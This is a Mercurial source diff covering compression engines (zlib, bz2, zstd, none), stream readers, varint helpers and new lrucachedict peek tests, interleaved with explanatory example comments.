3385 3399 protocol payloads, returns None.
3386 3400
3387 3401 Otherwise, returns ``compenginewireprotosupport`` with the following
3388 3402 fields:
3389 3403
3390 3404 * String format identifier
3391 3405 * Integer priority for the server
3392 3406 * Integer priority for the client
3393 3407
3394 3408 The integer priorities are used to order the advertisement of format
3395 3409 support by server and client. The highest integer is advertised
3396 3410 first. Integers with non-positive values aren't advertised.
3397 3411
3398 3412 The priority values are somewhat arbitrary and only used for default
3399 3413 ordering. The relative order can be changed via config options.
3400 3414
3401 3415 If wire protocol compression is supported, the class must also implement
3402 3416 ``compressstream`` and ``decompressorreader``.
3403 3417 """
3404 3418 return None
3405 3419
3406 3420 def revlogheader(self):
3407 3421 """Header added to revlog chunks that identifies this engine.
3408 3422
3409 3423 If this engine can be used to compress revlogs, this method should
3410 3424 return the bytes used to identify chunks compressed with this engine.
3411 3425 Else, the method should return ``None`` to indicate it does not
3412 3426 participate in revlog compression.
3413 3427 """
3414 3428 return None
3415 3429
3416 3430 def compressstream(self, it, opts=None):
3417 3431 """Compress an iterator of chunks.
3418 3432
3419 3433 The method receives an iterator (ideally a generator) of chunks of
3420 3434 bytes to be compressed. It returns an iterator (ideally a generator)
3421 3435 of chunks of bytes representing the compressed output.
3422 3436
3423 3437 Optionally accepts an argument defining how to perform compression.
3424 3438 Each engine treats this argument differently.
3425 3439 """
3426 3440 raise NotImplementedError()
3427 3441
3428 3442 def decompressorreader(self, fh):
3429 3443 """Perform decompression on a file object.
3430 3444
3431 3445 Argument is an object with a ``read(size)`` method that returns
3432 3446 compressed data. Return value is an object with a ``read(size)`` method that
3433 3447 returns uncompressed data.
3434 3448 """
3435 3449 raise NotImplementedError()
3436 3450
3437 3451 def revlogcompressor(self, opts=None):
3438 3452 """Obtain an object that can be used to compress revlog entries.
3439 3453
3440 3454 The object has a ``compress(data)`` method that compresses binary
3441 3455 data. This method returns compressed binary data or ``None`` if
3442 3456 the data could not be compressed (too small, not compressible, etc).
3443 3457 The returned data should have a header uniquely identifying this
3444 3458 compression format so decompression can be routed to this engine.
3445 3459 This header should be identified by the ``revlogheader()`` return
3446 3460 value.
3447 3461
3448 3462 The object has a ``decompress(data)`` method that decompresses
3449 3463 data. The method will only be called if ``data`` begins with
3450 3464 ``revlogheader()``. The method should return the raw, uncompressed
3451 3465 data or raise a ``StorageError``.
3452 3466
3453 3467 The object is reusable but is not thread safe.
3454 3468 """
3455 3469 raise NotImplementedError()
3456 3470
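# Illustrative sketch (not part of the original change): a hypothetical,
# unregistered engine wiring the interface above to stdlib zlib at a fixed
# level. Methods not overridden keep the base defaults (available() is
# True; bundle, wire protocol and revlog support default to None).
class _examplefixedzlibengine(compressionengine):
    def name(self):
        return 'example-zlib9'

    def compressstream(self, it, opts=None):
        # Compress each chunk as it arrives; only yield when the
        # compressor actually emits output.
        z = zlib.compressobj(9)
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data
        yield z.flush()

    def decompressorreader(self, fh):
        # Reuse the zlib stream reader defined below in this module.
        return _GzipCompressedStreamReader(fh)
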
3457 3471 class _CompressedStreamReader(object):
3458 3472 def __init__(self, fh):
3459 3473 if safehasattr(fh, 'unbufferedread'):
3460 3474 self._reader = fh.unbufferedread
3461 3475 else:
3462 3476 self._reader = fh.read
3463 3477 self._pending = []
3464 3478 self._pos = 0
3465 3479 self._eof = False
3466 3480
3467 3481 def _decompress(self, chunk):
3468 3482 raise NotImplementedError()
3469 3483
3470 3484 def read(self, l):
3471 3485 buf = []
3472 3486 while True:
3473 3487 while self._pending:
3474 3488 if len(self._pending[0]) > l + self._pos:
3475 3489 newbuf = self._pending[0]
3476 3490 buf.append(newbuf[self._pos:self._pos + l])
3477 3491 self._pos += l
3478 3492 return ''.join(buf)
3479 3493
3480 3494 newbuf = self._pending.pop(0)
3481 3495 if self._pos:
3482 3496 buf.append(newbuf[self._pos:])
3483 3497 l -= len(newbuf) - self._pos
3484 3498 else:
3485 3499 buf.append(newbuf)
3486 3500 l -= len(newbuf)
3487 3501 self._pos = 0
3488 3502
3489 3503 if self._eof:
3490 3504 return ''.join(buf)
3491 3505 chunk = self._reader(65536)
3492 3506 self._decompress(chunk)
3493 3507 if not chunk and not self._pending and not self._eof:
3494 3508 # No progress and no new data, bail out
3495 3509 return ''.join(buf)
3496 3510
3497 3511 class _GzipCompressedStreamReader(_CompressedStreamReader):
3498 3512 def __init__(self, fh):
3499 3513 super(_GzipCompressedStreamReader, self).__init__(fh)
3500 3514 self._decompobj = zlib.decompressobj()
3501 3515 def _decompress(self, chunk):
3502 3516 newbuf = self._decompobj.decompress(chunk)
3503 3517 if newbuf:
3504 3518 self._pending.append(newbuf)
3505 3519 d = self._decompobj.copy()
3506 3520 try:
3507 3521 d.decompress('x')
3508 3522 d.flush()
3509 3523 if d.unused_data == 'x':
3510 3524 self._eof = True
3511 3525 except zlib.error:
3512 3526 pass
3513 3527
3514 3528 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3515 3529 def __init__(self, fh):
3516 3530 super(_BZ2CompressedStreamReader, self).__init__(fh)
3517 3531 self._decompobj = bz2.BZ2Decompressor()
3518 3532 def _decompress(self, chunk):
3519 3533 newbuf = self._decompobj.decompress(chunk)
3520 3534 if newbuf:
3521 3535 self._pending.append(newbuf)
3522 3536 try:
3523 3537 while True:
3524 3538 newbuf = self._decompobj.decompress('')
3525 3539 if newbuf:
3526 3540 self._pending.append(newbuf)
3527 3541 else:
3528 3542 break
3529 3543 except EOFError:
3530 3544 self._eof = True
3531 3545
3532 3546 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3533 3547 def __init__(self, fh):
3534 3548 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3535 3549 newbuf = self._decompobj.decompress('BZ')
3536 3550 if newbuf:
3537 3551 self._pending.append(newbuf)
3538 3552
3539 3553 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3540 3554 def __init__(self, fh, zstd):
3541 3555 super(_ZstdCompressedStreamReader, self).__init__(fh)
3542 3556 self._zstd = zstd
3543 3557 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3544 3558 def _decompress(self, chunk):
3545 3559 newbuf = self._decompobj.decompress(chunk)
3546 3560 if newbuf:
3547 3561 self._pending.append(newbuf)
3548 3562 try:
3549 3563 while True:
3550 3564 newbuf = self._decompobj.decompress('')
3551 3565 if newbuf:
3552 3566 self._pending.append(newbuf)
3553 3567 else:
3554 3568 break
3555 3569 except self._zstd.ZstdError:
3556 3570 self._eof = True
3557 3571
3558 3572 class _zlibengine(compressionengine):
3559 3573 def name(self):
3560 3574 return 'zlib'
3561 3575
3562 3576 def bundletype(self):
3563 3577 """zlib compression using the DEFLATE algorithm.
3564 3578
3565 3579 All Mercurial clients should support this format. The compression
3566 3580 algorithm strikes a reasonable balance between compression ratio
3567 3581 and speed.
3568 3582 """
3569 3583 return 'gzip', 'GZ'
3570 3584
3571 3585 def wireprotosupport(self):
3572 3586 return compewireprotosupport('zlib', 20, 20)
3573 3587
3574 3588 def revlogheader(self):
3575 3589 return 'x'
3576 3590
3577 3591 def compressstream(self, it, opts=None):
3578 3592 opts = opts or {}
3579 3593
3580 3594 z = zlib.compressobj(opts.get('level', -1))
3581 3595 for chunk in it:
3582 3596 data = z.compress(chunk)
3583 3597 # Not all calls to compress emit data. It is cheaper to inspect
3584 3598 # here than to feed empty chunks through the generator.
3585 3599 if data:
3586 3600 yield data
3587 3601
3588 3602 yield z.flush()
3589 3603
3590 3604 def decompressorreader(self, fh):
3591 3605 return _GzipCompressedStreamReader(fh)
3592 3606
3593 3607 class zlibrevlogcompressor(object):
3594 3608 def compress(self, data):
3595 3609 insize = len(data)
3596 3610 # Caller handles empty input case.
3597 3611 assert insize > 0
3598 3612
3599 3613 if insize < 44:
3600 3614 return None
3601 3615
3602 3616 elif insize <= 1000000:
3603 3617 compressed = zlib.compress(data)
3604 3618 if len(compressed) < insize:
3605 3619 return compressed
3606 3620 return None
3607 3621
3608 3622 # zlib makes an internal copy of the input buffer, doubling
3609 3623 # memory usage for large inputs. So do streaming compression
3610 3624 # on large inputs.
3611 3625 else:
3612 3626 z = zlib.compressobj()
3613 3627 parts = []
3614 3628 pos = 0
3615 3629 while pos < insize:
3616 3630 pos2 = pos + 2**20
3617 3631 parts.append(z.compress(data[pos:pos2]))
3618 3632 pos = pos2
3619 3633 parts.append(z.flush())
3620 3634
3621 3635 if sum(map(len, parts)) < insize:
3622 3636 return ''.join(parts)
3623 3637 return None
3624 3638
3625 3639 def decompress(self, data):
3626 3640 try:
3627 3641 return zlib.decompress(data)
3628 3642 except zlib.error as e:
3629 3643 raise error.StorageError(_('revlog decompress error: %s') %
3630 3644 stringutil.forcebytestr(e))
3631 3645
3632 3646 def revlogcompressor(self, opts=None):
3633 3647 return self.zlibrevlogcompressor()
3634 3648
3635 3649 compengines.register(_zlibengine())
3636 3650
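# Illustrative sketch (not part of the original change): round-trip a
# payload through the zlib engine's paired stream APIs. This helper is
# hypothetical and never called.
def _examplezlibroundtrip():
    engine = compengines['zlib']
    payload = b'hello world' * 100
    compressed = b''.join(engine.compressstream(iter([payload])))
    reader = engine.decompressorreader(bytesio(compressed))
    assert reader.read(len(payload)) == payload
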
3637 3651 class _bz2engine(compressionengine):
3638 3652 def name(self):
3639 3653 return 'bz2'
3640 3654
3641 3655 def bundletype(self):
3642 3656 """An algorithm that produces smaller bundles than ``gzip``.
3643 3657
3644 3658 All Mercurial clients should support this format.
3645 3659
3646 3660 This engine will likely produce smaller bundles than ``gzip`` but
3647 3661 will be significantly slower, both during compression and
3648 3662 decompression.
3649 3663
3650 3664 If available, the ``zstd`` engine can yield similar or better
3651 3665 compression at much higher speeds.
3652 3666 """
3653 3667 return 'bzip2', 'BZ'
3654 3668
3655 3669 # We declare a protocol name but don't advertise it by default because
3656 3670 # it is slow.
3657 3671 def wireprotosupport(self):
3658 3672 return compewireprotosupport('bzip2', 0, 0)
3659 3673
3660 3674 def compressstream(self, it, opts=None):
3661 3675 opts = opts or {}
3662 3676 z = bz2.BZ2Compressor(opts.get('level', 9))
3663 3677 for chunk in it:
3664 3678 data = z.compress(chunk)
3665 3679 if data:
3666 3680 yield data
3667 3681
3668 3682 yield z.flush()
3669 3683
3670 3684 def decompressorreader(self, fh):
3671 3685 return _BZ2CompressedStreamReader(fh)
3672 3686
3673 3687 compengines.register(_bz2engine())
3674 3688
3675 3689 class _truncatedbz2engine(compressionengine):
3676 3690 def name(self):
3677 3691 return 'bz2truncated'
3678 3692
3679 3693 def bundletype(self):
3680 3694 return None, '_truncatedBZ'
3681 3695
3682 3696 # We don't implement compressstream because it is hackily handled elsewhere.
3683 3697
3684 3698 def decompressorreader(self, fh):
3685 3699 return _TruncatedBZ2CompressedStreamReader(fh)
3686 3700
3687 3701 compengines.register(_truncatedbz2engine())
3688 3702
3689 3703 class _noopengine(compressionengine):
3690 3704 def name(self):
3691 3705 return 'none'
3692 3706
3693 3707 def bundletype(self):
3694 3708 """No compression is performed.
3695 3709
3696 3710 Use this compression engine to explicitly disable compression.
3697 3711 """
3698 3712 return 'none', 'UN'
3699 3713
3700 3714 # Clients always support uncompressed payloads. Servers don't advertise
3701 3715 # support by default because, unless you are on a fast network,
3702 3716 # uncompressed payloads can easily saturate your network pipe.
3703 3717 def wireprotosupport(self):
3704 3718 return compewireprotosupport('none', 0, 10)
3705 3719
3706 3720 # We don't implement revlogheader because it is handled specially
3707 3721 # in the revlog class.
3708 3722
3709 3723 def compressstream(self, it, opts=None):
3710 3724 return it
3711 3725
3712 3726 def decompressorreader(self, fh):
3713 3727 return fh
3714 3728
3715 3729 class nooprevlogcompressor(object):
3716 3730 def compress(self, data):
3717 3731 return None
3718 3732
3719 3733 def revlogcompressor(self, opts=None):
3720 3734 return self.nooprevlogcompressor()
3721 3735
3722 3736 compengines.register(_noopengine())
3723 3737
3724 3738 class _zstdengine(compressionengine):
3725 3739 def name(self):
3726 3740 return 'zstd'
3727 3741
3728 3742 @propertycache
3729 3743 def _module(self):
3730 3744 # Not all installs have the zstd module available. So defer importing
3731 3745 # until first access.
3732 3746 try:
3733 3747 from . import zstd
3734 3748 # Force delayed import.
3735 3749 zstd.__version__
3736 3750 return zstd
3737 3751 except ImportError:
3738 3752 return None
3739 3753
3740 3754 def available(self):
3741 3755 return bool(self._module)
3742 3756
3743 3757 def bundletype(self):
3744 3758 """A modern compression algorithm that is fast and highly flexible.
3745 3759
3746 3760 Only supported by Mercurial 4.1 and newer clients.
3747 3761
3748 3762 With the default settings, zstd compression is both faster than
3749 3763 ``gzip`` and yields better compression. It also frequently yields better
3750 3764 compression than ``bzip2`` while operating at much higher speeds.
3751 3765
3752 3766 If this engine is available and backwards compatibility is not a
3753 3767 concern, it is likely the best available engine.
3754 3768 """
3755 3769 return 'zstd', 'ZS'
3756 3770
3757 3771 def wireprotosupport(self):
3758 3772 return compewireprotosupport('zstd', 50, 50)
3759 3773
3760 3774 def revlogheader(self):
3761 3775 return '\x28'
3762 3776
3763 3777 def compressstream(self, it, opts=None):
3764 3778 opts = opts or {}
3765 3779 # zstd level 3 is almost always significantly faster than zlib
3766 3780 # while providing no worse compression. It strikes a good balance
3767 3781 # between speed and compression.
3768 3782 level = opts.get('level', 3)
3769 3783
3770 3784 zstd = self._module
3771 3785 z = zstd.ZstdCompressor(level=level).compressobj()
3772 3786 for chunk in it:
3773 3787 data = z.compress(chunk)
3774 3788 if data:
3775 3789 yield data
3776 3790
3777 3791 yield z.flush()
3778 3792
3779 3793 def decompressorreader(self, fh):
3780 3794 return _ZstdCompressedStreamReader(fh, self._module)
3781 3795
3782 3796 class zstdrevlogcompressor(object):
3783 3797 def __init__(self, zstd, level=3):
3784 3798 # TODO consider omitting frame magic to save 4 bytes.
3785 3799 # This writes content sizes into the frame header. That is
3786 3800 # extra storage. But it allows a correct size memory allocation
3787 3801 # to hold the result.
3788 3802 self._cctx = zstd.ZstdCompressor(level=level)
3789 3803 self._dctx = zstd.ZstdDecompressor()
3790 3804 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3791 3805 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3792 3806
3793 3807 def compress(self, data):
3794 3808 insize = len(data)
3795 3809 # Caller handles empty input case.
3796 3810 assert insize > 0
3797 3811
3798 3812 if insize < 50:
3799 3813 return None
3800 3814
3801 3815 elif insize <= 1000000:
3802 3816 compressed = self._cctx.compress(data)
3803 3817 if len(compressed) < insize:
3804 3818 return compressed
3805 3819 return None
3806 3820 else:
3807 3821 z = self._cctx.compressobj()
3808 3822 chunks = []
3809 3823 pos = 0
3810 3824 while pos < insize:
3811 3825 pos2 = pos + self._compinsize
3812 3826 chunk = z.compress(data[pos:pos2])
3813 3827 if chunk:
3814 3828 chunks.append(chunk)
3815 3829 pos = pos2
3816 3830 chunks.append(z.flush())
3817 3831
3818 3832 if sum(map(len, chunks)) < insize:
3819 3833 return ''.join(chunks)
3820 3834 return None
3821 3835
3822 3836 def decompress(self, data):
3823 3837 insize = len(data)
3824 3838
3825 3839 try:
3826 3840 # This was measured to be faster than other streaming
3827 3841 # decompressors.
3828 3842 dobj = self._dctx.decompressobj()
3829 3843 chunks = []
3830 3844 pos = 0
3831 3845 while pos < insize:
3832 3846 pos2 = pos + self._decompinsize
3833 3847 chunk = dobj.decompress(data[pos:pos2])
3834 3848 if chunk:
3835 3849 chunks.append(chunk)
3836 3850 pos = pos2
3837 3851 # Frame should be exhausted, so no finish() API.
3838 3852
3839 3853 return ''.join(chunks)
3840 3854 except Exception as e:
3841 3855 raise error.StorageError(_('revlog decompress error: %s') %
3842 3856 stringutil.forcebytestr(e))
3843 3857
3844 3858 def revlogcompressor(self, opts=None):
3845 3859 opts = opts or {}
3846 3860 return self.zstdrevlogcompressor(self._module,
3847 3861 level=opts.get('level', 3))
3848 3862
3849 3863 compengines.register(_zstdengine())
3850 3864
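# Illustrative sketch (not part of the original change): exercise the
# revlogcompressor() contract against the always-available zlib engine.
# This helper is hypothetical and never called.
def _examplezlibrevlogcompressor():
    compressor = compengines['zlib'].revlogcompressor()
    data = b'x' * 1024
    compressed = compressor.compress(data)
    # compress() returns None when compressing isn't worthwhile; this
    # highly repetitive input compresses well and round-trips.
    assert compressed is not None
    assert compressor.decompress(compressed) == data
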
3851 3865 def bundlecompressiontopics():
3852 3866 """Obtains a list of available bundle compressions for use in help."""
3853 3867 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3854 3868 items = {}
3855 3869
3856 3870 # We need to format the docstring. So use a dummy object/type to hold it
3857 3871 # rather than mutating the original.
3858 3872 class docobject(object):
3859 3873 pass
3860 3874
3861 3875 for name in compengines:
3862 3876 engine = compengines[name]
3863 3877
3864 3878 if not engine.available():
3865 3879 continue
3866 3880
3867 3881 bt = engine.bundletype()
3868 3882 if not bt or not bt[0]:
3869 3883 continue
3870 3884
3871 3885 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3872 3886
3873 3887 value = docobject()
3874 3888 value.__doc__ = pycompat.sysstr(doc)
3875 3889 value._origdoc = engine.bundletype.__doc__
3876 3890 value._origfunc = engine.bundletype
3877 3891
3878 3892 items[bt[0]] = value
3879 3893
3880 3894 return items
3881 3895
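# Illustrative example (not part of the original change): the returned dict
# maps user-facing bundle spec names to documented stubs, so
# sorted(bundlecompressiontopics()) yields ['bzip2', 'gzip', 'none'], plus
# 'zstd' when the zstd module is importable.
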
3882 3896 i18nfunctions = bundlecompressiontopics().values()
3883 3897
3884 3898 # convenient shortcut
3885 3899 dst = debugstacktrace
3886 3900
3887 3901 def safename(f, tag, ctx, others=None):
3888 3902 """
3889 3903 Generate a name that is safe to rename f to in the given context.
3890 3904
3891 3905 f: filename to rename
3892 3906 tag: a string tag that will be included in the new name
3893 3907 ctx: a context, in which the new name must not exist
3894 3908 others: a set of other filenames that the new name must not be in
3895 3909
3896 3910 Returns a file name of the form oldname~tag[~number] which does not exist
3897 3911 in the provided context and is not in the set of other names.
3898 3912 """
3899 3913 if others is None:
3900 3914 others = set()
3901 3915
3902 3916 fn = '%s~%s' % (f, tag)
3903 3917 if fn not in ctx and fn not in others:
3904 3918 return fn
3905 3919 for n in itertools.count(1):
3906 3920 fn = '%s~%s~%s' % (f, tag, n)
3907 3921 if fn not in ctx and fn not in others:
3908 3922 return fn
3909 3923
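# Illustrative example (not part of the original change): with an empty
# context, the first candidate is free; known collisions get a counter.
#
#   safename('f.txt', 'orig', set())                  -> 'f.txt~orig'
#   safename('f.txt', 'orig', set(), {'f.txt~orig'})  -> 'f.txt~orig~1'
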
3910 3924 def readexactly(stream, n):
3911 3925 '''read n bytes from stream.read and abort if fewer were available'''
3912 3926 s = stream.read(n)
3913 3927 if len(s) < n:
3914 3928 raise error.Abort(_("stream ended unexpectedly"
3915 3929 " (got %d bytes, expected %d)")
3916 3930 % (len(s), n))
3917 3931 return s
3918 3932
3919 3933 def uvarintencode(value):
3920 3934 """Encode an unsigned integer value to a varint.
3921 3935
3922 3936 A varint is a variable length integer of 1 or more bytes. Each byte
3923 3937 except the last has the most significant bit set. The lower 7 bits of
3924 3938 each byte store the unsigned value, least significant group
3925 3939 first.
3926 3940
3927 3941 >>> uvarintencode(0)
3928 3942 '\\x00'
3929 3943 >>> uvarintencode(1)
3930 3944 '\\x01'
3931 3945 >>> uvarintencode(127)
3932 3946 '\\x7f'
3933 3947 >>> uvarintencode(1337)
3934 3948 '\\xb9\\n'
3935 3949 >>> uvarintencode(65536)
3936 3950 '\\x80\\x80\\x04'
3937 3951 >>> uvarintencode(-1)
3938 3952 Traceback (most recent call last):
3939 3953 ...
3940 3954 ProgrammingError: negative value for uvarint: -1
3941 3955 """
3942 3956 if value < 0:
3943 3957 raise error.ProgrammingError('negative value for uvarint: %d'
3944 3958 % value)
3945 3959 bits = value & 0x7f
3946 3960 value >>= 7
3947 3961 bytes = []
3948 3962 while value:
3949 3963 bytes.append(pycompat.bytechr(0x80 | bits))
3950 3964 bits = value & 0x7f
3951 3965 value >>= 7
3952 3966 bytes.append(pycompat.bytechr(bits))
3953 3967
3954 3968 return ''.join(bytes)
3955 3969
3956 3970 def uvarintdecodestream(fh):
3957 3971 """Decode an unsigned variable length integer from a stream.
3958 3972
3959 3973 The passed argument is anything that has a ``.read(N)`` method.
3960 3974
3961 3975 >>> try:
3962 3976 ... from StringIO import StringIO as BytesIO
3963 3977 ... except ImportError:
3964 3978 ... from io import BytesIO
3965 3979 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3966 3980 0
3967 3981 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3968 3982 1
3969 3983 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3970 3984 127
3971 3985 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3972 3986 1337
3973 3987 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3974 3988 65536
3975 3989 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3976 3990 Traceback (most recent call last):
3977 3991 ...
3978 3992 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3979 3993 """
3980 3994 result = 0
3981 3995 shift = 0
3982 3996 while True:
3983 3997 byte = ord(readexactly(fh, 1))
3984 3998 result |= ((byte & 0x7f) << shift)
3985 3999 if not (byte & 0x80):
3986 4000 return result
3987 4001 shift += 7
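
# Illustrative example (not part of the original change): the two helpers
# above are inverses over a byte stream:
#
#   >>> from io import BytesIO
#   >>> uvarintdecodestream(BytesIO(uvarintencode(1337)))
#   1337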
@@ -1,337 +1,352
1 1 from __future__ import absolute_import, print_function
2 2
3 3 import unittest
4 4
5 5 import silenttestrunner
6 6
7 7 from mercurial import (
8 8 util,
9 9 )
10 10
11 11 class testlrucachedict(unittest.TestCase):
12 12 def testsimple(self):
13 13 d = util.lrucachedict(4)
14 14 self.assertEqual(d.capacity, 4)
15 15 d.insert('a', 'va', cost=2)
16 16 d['b'] = 'vb'
17 17 d['c'] = 'vc'
18 18 d.insert('d', 'vd', cost=42)
19 19
20 20 self.assertEqual(d['a'], 'va')
21 21 self.assertEqual(d['b'], 'vb')
22 22 self.assertEqual(d['c'], 'vc')
23 23 self.assertEqual(d['d'], 'vd')
24 24
25 25 self.assertEqual(d.totalcost, 44)
26 26
27 27 # 'a' should be dropped because it was least recently used.
28 28 d['e'] = 've'
29 29 self.assertNotIn('a', d)
30 30 self.assertIsNone(d.get('a'))
31 31 self.assertEqual(d.totalcost, 42)
32 32
33 33 self.assertEqual(d['b'], 'vb')
34 34 self.assertEqual(d['c'], 'vc')
35 35 self.assertEqual(d['d'], 'vd')
36 36 self.assertEqual(d['e'], 've')
37 37
38 38 # Replacing item with different cost adjusts totalcost.
39 39 d.insert('e', 've', cost=4)
40 40 self.assertEqual(d.totalcost, 46)
41 41
42 42 # Touch entries in some order (both get and set).
43 43 d['e']
44 44 d['c'] = 'vc2'
45 45 d['d']
46 46 d['b'] = 'vb2'
47 47
48 48 # 'e' should be dropped now
49 49 d['f'] = 'vf'
50 50 self.assertNotIn('e', d)
51 51 self.assertEqual(d['b'], 'vb2')
52 52 self.assertEqual(d['c'], 'vc2')
53 53 self.assertEqual(d['d'], 'vd')
54 54 self.assertEqual(d['f'], 'vf')
55 55
56 56 d.clear()
57 57 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
58 58 self.assertNotIn(key, d)
59 59
60 60 def testunfull(self):
61 61 d = util.lrucachedict(4)
62 62 d['a'] = 1
63 63 d['b'] = 2
64 64 d['a']
65 65 d['b']
66 66
67 67 for key in ('a', 'b'):
68 68 self.assertIn(key, d)
69 69
70 70 def testget(self):
71 71 d = util.lrucachedict(4)
72 72 d['a'] = 'va'
73 73 d['b'] = 'vb'
74 74 d['c'] = 'vc'
75 75
76 76 self.assertIsNone(d.get('missing'))
77 77 self.assertEqual(list(d), ['c', 'b', 'a'])
78 78
79 79 self.assertEqual(d.get('a'), 'va')
80 80 self.assertEqual(list(d), ['a', 'c', 'b'])
81 81
82 def testpeek(self):
83 d = util.lrucachedict(4)
84 d['a'] = 'va'
85 d['b'] = 'vb'
86 d['c'] = 'vc'
87
88 with self.assertRaises(KeyError):
89 d.peek('missing')
90 self.assertEqual(list(d), ['c', 'b', 'a'])
91 self.assertIsNone(d.peek('missing', None))
92 self.assertEqual(list(d), ['c', 'b', 'a'])
93
94 self.assertEqual(d.peek('a'), 'va')
95 self.assertEqual(list(d), ['c', 'b', 'a'])
96
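    # Illustrative note (not part of the original change): unlike get(),
    # peek() must not refresh an entry's recency, so a peeked key is still
    # the first eviction candidate:
    #
    #   d = util.lrucachedict(2)
    #   d['a'] = 1
    #   d['b'] = 2
    #   d.peek('a')    # does not mark 'a' as recently used
    #   d['c'] = 3     # evicts 'a', still the least recently used entry
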
82 97 def testcopypartial(self):
83 98 d = util.lrucachedict(4)
84 99 d.insert('a', 'va', cost=4)
85 100 d.insert('b', 'vb', cost=2)
86 101
87 102 dc = d.copy()
88 103
89 104 self.assertEqual(len(dc), 2)
90 105 self.assertEqual(dc.totalcost, 6)
91 106 for key in ('a', 'b'):
92 107 self.assertIn(key, dc)
93 108 self.assertEqual(dc[key], 'v%s' % key)
94 109
95 110 self.assertEqual(len(d), 2)
96 111 for key in ('a', 'b'):
97 112 self.assertIn(key, d)
98 113 self.assertEqual(d[key], 'v%s' % key)
99 114
100 115 d['c'] = 'vc'
101 116 del d['b']
102 117 self.assertEqual(d.totalcost, 4)
103 118 dc = d.copy()
104 119 self.assertEqual(len(dc), 2)
105 120 self.assertEqual(dc.totalcost, 4)
106 121 for key in ('a', 'c'):
107 122 self.assertIn(key, dc)
108 123 self.assertEqual(dc[key], 'v%s' % key)
109 124
110 125 def testcopyempty(self):
111 126 d = util.lrucachedict(4)
112 127 dc = d.copy()
113 128 self.assertEqual(len(dc), 0)
114 129
115 130 def testcopyfull(self):
116 131 d = util.lrucachedict(4)
117 132 d.insert('a', 'va', cost=42)
118 133 d['b'] = 'vb'
119 134 d['c'] = 'vc'
120 135 d['d'] = 'vd'
121 136
122 137 dc = d.copy()
123 138
124 139 for key in ('a', 'b', 'c', 'd'):
125 140 self.assertIn(key, dc)
126 141 self.assertEqual(dc[key], 'v%s' % key)
127 142
128 143 self.assertEqual(d.totalcost, 42)
129 144 self.assertEqual(dc.totalcost, 42)
130 145
131 146 # 'a' should be dropped because it was least recently used.
132 147 dc['e'] = 've'
133 148 self.assertNotIn('a', dc)
134 149 for key in ('b', 'c', 'd', 'e'):
135 150 self.assertIn(key, dc)
136 151 self.assertEqual(dc[key], 'v%s' % key)
137 152
138 153 self.assertEqual(d.totalcost, 42)
139 154 self.assertEqual(dc.totalcost, 0)
140 155
141 156 # Contents and order of original dict should remain unchanged.
142 157 dc['b'] = 'vb_new'
143 158
144 159 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
145 160 for key in ('a', 'b', 'c', 'd'):
146 161 self.assertEqual(d[key], 'v%s' % key)
147 162
148 163 d = util.lrucachedict(4, maxcost=42)
149 164 d.insert('a', 'va', cost=5)
150 165 d.insert('b', 'vb', cost=4)
151 166 d.insert('c', 'vc', cost=3)
152 167 dc = d.copy()
153 168 self.assertEqual(dc.maxcost, 42)
154 169 self.assertEqual(len(dc), 3)
155 170
156 171 # Max cost can be lowered as part of copy.
157 172 dc = d.copy(maxcost=10)
158 173 self.assertEqual(dc.maxcost, 10)
159 174 self.assertEqual(len(dc), 2)
160 175 self.assertEqual(dc.totalcost, 7)
161 176 self.assertIn('b', dc)
162 177 self.assertIn('c', dc)
163 178
164 179 def testcopydecreasecapacity(self):
165 180 d = util.lrucachedict(5)
166 181 d.insert('a', 'va', cost=4)
167 182 d.insert('b', 'vb', cost=2)
168 183 d['c'] = 'vc'
169 184 d['d'] = 'vd'
170 185
171 186 dc = d.copy(2)
172 187 self.assertEqual(dc.totalcost, 0)
173 188 for key in ('a', 'b'):
174 189 self.assertNotIn(key, dc)
175 190 for key in ('c', 'd'):
176 191 self.assertIn(key, dc)
177 192 self.assertEqual(dc[key], 'v%s' % key)
178 193
179 194 dc.insert('e', 've', cost=7)
180 195 self.assertEqual(dc.totalcost, 7)
181 196 self.assertNotIn('c', dc)
182 197 for key in ('d', 'e'):
183 198 self.assertIn(key, dc)
184 199 self.assertEqual(dc[key], 'v%s' % key)
185 200
186 201 # Original should remain unchanged.
187 202 self.assertEqual(d.totalcost, 6)
188 203 for key in ('a', 'b', 'c', 'd'):
189 204 self.assertIn(key, d)
190 205 self.assertEqual(d[key], 'v%s' % key)
191 206
192 207 def testcopyincreasecapacity(self):
193 208 d = util.lrucachedict(5)
194 209 d['a'] = 'va'
195 210 d['b'] = 'vb'
196 211 d['c'] = 'vc'
197 212 d['d'] = 'vd'
198 213
199 214 dc = d.copy(6)
200 215 for key in ('a', 'b', 'c', 'd'):
201 216 self.assertIn(key, dc)
202 217 self.assertEqual(dc[key], 'v%s' % key)
203 218
204 219 dc['e'] = 've'
205 220 dc['f'] = 'vf'
206 221 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
207 222 self.assertIn(key, dc)
208 223 self.assertEqual(dc[key], 'v%s' % key)
209 224
210 225 dc['g'] = 'vg'
211 226 self.assertNotIn('a', dc)
212 227 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
213 228 self.assertIn(key, dc)
214 229 self.assertEqual(dc[key], 'v%s' % key)
215 230
216 231 # Original should remain unchanged.
217 232 for key in ('a', 'b', 'c', 'd'):
218 233 self.assertIn(key, d)
219 234 self.assertEqual(d[key], 'v%s' % key)
220 235
221 236 def testpopoldest(self):
222 237 d = util.lrucachedict(4)
223 238 d.insert('a', 'va', cost=10)
224 239 d.insert('b', 'vb', cost=5)
225 240
226 241 self.assertEqual(len(d), 2)
